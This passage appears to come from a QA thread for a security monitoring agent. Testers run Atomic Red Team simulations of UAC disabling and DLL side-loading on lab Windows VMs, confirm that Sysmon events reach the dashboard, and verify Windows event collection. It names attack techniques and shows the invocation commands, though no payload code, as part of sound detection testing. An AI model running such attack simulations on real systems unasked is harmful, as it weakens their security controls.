Bypass with WSReset Registry Modification Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Sysmon event log


Dashboard event

 

T1574.002 – Hijack Execution Flow: DLL Side-Loading

GetPrereqs

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1574.002 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Attempting to satisfy prereq: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe) Prereq already met: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe) GetPrereq's for: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable Attempting to satisfy prereq: .Net SDK must be installed Prereq already met: .Net SDK must be installed Attempting to satisfy prereq: preloader must exist Prereq already met: preloader must exist PS C:\Users\vagrant\Desktop\Sysmon ```

Test run

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1574.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Exit code: -1073741515 Done executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable Unhandled exception. System.ArgumentException: The startup hook simple assembly name '"C:\AtomicRedTeam\atomics\T1574.002\bin\preloader.dll" ' is invalid. It must be a valid assembly name and it may not contain directory separator, space or comma characters and must not end with '.dll'. at System.StartupHookProvider.ParseStartupHook(StartupHookNameOrPath& startupHook, String startupHookPart) at System.StartupHookProvider.ProcessStartupHooks(String diagnosticStartupHooks) Exit code: 0 Done executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable PS C:\Users\vagrant\Desktop\Sysmon> ```

Cleanup

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1574.002 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Done executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable Done executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable PS C:\Users\vagrant\Desktop\Sysmon> ```

Sysmon event log


Dashboard event

 

[LucioDonda]

Test that Windows data collection works out of the box.

After enabling logall and sending Windows Events, we can see the logs immediately:

Windows 11 🟢

1. Create an event in the Windows agent ```console PS C:\Users\vagrant\Sysmon> EVENTCREATE /T ERROR /L APPLICATION /so TESTING /ID 999 /D "%1 %2" SUCCESS: An event of type 'ERROR' was created in the 'APPLICATION' log with 'TESTING' as the source. PS C:\Users\vagrant\Sysmon> ``` 2. Check logs in the manager ```console [root@vm-oracle9 vagrant]# cat /var/ossec/logs/archives/archives.log | grep '2024 Feb 27 22:30:07 (DESKTOP-D42041D) any->EventChannel {"win":{"system":{"providerName":"TESTING"' 2024 Feb 27 22:30:07 (DESKTOP-D42041D) any->EventChannel {"win":{"system":{"providerName":"TESTING","eventID":"999","version":"0","level":"2","task":"0","opcode":"0","keywords":"0x80000000000000","systemTime":"2024-02-27T22:30:07.9596517Z","eventRecordID":"877","processID":"13100","threadID":"0","channel":"Application","computer":"DESKTOP-D42041D","severityValue":"ERROR","message":"\"%1 %2\""},"eventdata":{"data":"%1 %2"}}} [root@vm-oracle9 vagrant]# ``` 3. Dashboard  

Windows Server 2022 🟢

1. Create an event in the Windows agent ```console PS C:\Users\vagrant> EVENTCREATE /T ERROR /L APPLICATION /so TESTING /ID 999 /D "%1 %2" SUCCESS: An event of type 'ERROR' was created in the 'APPLICATION' log with 'TESTING' as the source. PS C:\Windows\system32> Get-NetIPAddress -AddressFamily IPV4 IPAddress : 192.168.56.103 InterfaceIndex : 7 InterfaceAlias : Ethernet 2 AddressFamily : IPv4 Type : Unicast PrefixLength : 24 PrefixOrigin : Dhcp SuffixOrigin : Dhcp AddressState : Preferred ValidLifetime : 00:09:58 PreferredLifetime : 00:09:58 SkipAsSource : False PolicyStore : ActiveStore IPAddress : 10.0.2.15 InterfaceIndex : 3 InterfaceAlias : Ethernet AddressFamily : IPv4 Type : Unicast PrefixLength : 24 PrefixOrigin : Dhcp SuffixOrigin : Dhcp AddressState : Preferred ValidLifetime : 23:59:58 PreferredLifetime : 23:59:58 SkipAsSource : False PolicyStore : ActiveStore IPAddress : 127.0.0.1 InterfaceIndex : 1 InterfaceAlias : Loopback Pseudo-Interface 1 AddressFamily : IPv4 Type : Unicast PrefixLength : 8 PrefixOrigin : WellKnown SuffixOrigin : WellKnown AddressState : Preferred ValidLifetime : Infinite ([TimeSpan]::MaxValue) PreferredLifetime : Infinite ([TimeSpan]::MaxValue) SkipAsSource : False PolicyStore : ActiveStore ``` 2. Check logs in the manager ```console [root@vm-oracle9 vagrant]# cat /var/ossec/logs/archives/archives.log | grep '"eventID":"999"' 2024 Feb 28 01:10:58 (WIN-PJCK32G1EDD) any->EventChannel {"win":{"system":{"providerName":"TESTING","eventID":"999","version":"0","level":"2","task":"0","opcode":"0","keywords":"0x80000000000000","systemTime":"2024-02-28T01:10:58.4800666Z","eventRecordID":"396","processID":"0","threadID":"0","channel":"Application","computer":"WIN-PJCK32G1EDD","severityValue":"ERROR"},"eventdata":{"data":"%1 %2"}}} ``` 4. Dashboard 

[damarisg]

LGTM!!